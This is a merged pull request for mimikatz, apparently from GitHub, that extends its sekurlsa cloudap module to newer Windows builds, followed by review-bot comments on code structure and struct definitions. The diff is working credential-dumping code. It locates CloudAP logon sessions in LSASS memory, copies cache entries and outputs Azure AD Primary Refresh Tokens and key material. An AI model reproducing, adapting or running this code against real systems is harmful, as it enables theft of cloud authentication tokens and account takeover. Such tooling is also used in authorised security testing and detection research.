cloudap support for versions > 1909 #400

Merged
merged 1 commit into from
Jul 29, 2022
88 changes: 66 additions & 22 deletions mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
Expand Up @@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])

void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;

KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
KIWI_CLOUDAP_CACHE_UNK unk;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};

if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
{
if(logon.cacheEntry)
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
if(logon.cacheEntry)
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}

if(cache.toDetermine)
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
}
}
else
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
{
if(logon.cacheEntry)
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}

if(cache.toDetermine)
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
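Review bot: The two build-number branches of kuhl_m_sekurlsa_enum_logon_callback_cloudap duplicate the entire cache handling — from `if(logon.cacheEntry)` down to the `kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);` call — and differ only in the logon list entry type passed to `FIELD_OFFSET` and `sizeof`. Moving the shared part into a file-scope helper such as `static void kuhl_m_sekurlsa_cloudap_cache(PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry, PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)` would leave each branch with the list walk, the copy and a single call `kuhl_m_sekurlsa_cloudap_cache(logon.cacheEntry, pData);`, so a future layout change is edited once instead of twice. The `> KULL_M_WIN_BUILD_10_1909` threshold also deserves a comment recording which builds the `_21H2` layout was verified against, since the struct name says 21H2 while the condition admits every build after 1909. The `if(aLsassMemory.address = ...)` assignment-in-condition is inherited from the old code, but the two new occurrences would be clearer and warning-free as `if((aLsassMemory.address = ...) != NULL)`.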
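--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
@@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
 DWORD unk6;
 PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
 // ...
-} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
+
+typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
+struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
+struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
+DWORD unk0;
+DWORD unk1;
+DWORD unk2;
+LUID LocallyUniqueIdentifier;
+DWORD unk3;
+DWORD64 unk4;
+DWORD64 unk5;
+PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
+// ...
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;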
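Review bot: The `Flink` and `Blink` members of the new `_KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2` are declared as `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY*`, i.e. they point at the pre-1909 entry type, although the list they link is walked with `FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, ...)` in the .c change; the pointer size is the same so nothing breaks, but the self-referential `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Flink;` / `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Blink;` documents the intended layout and prevents an accidental mix of the two entry types. A one-line comment above the typedef naming the build(s) the offsets were taken from would help the next person who has to add a layout, since the `unk*` fields give no other clue. Minor style: the closing line uses `* PKIWI_...` while the `_11` typedef just above uses `*PKIWI_...`; keep one form.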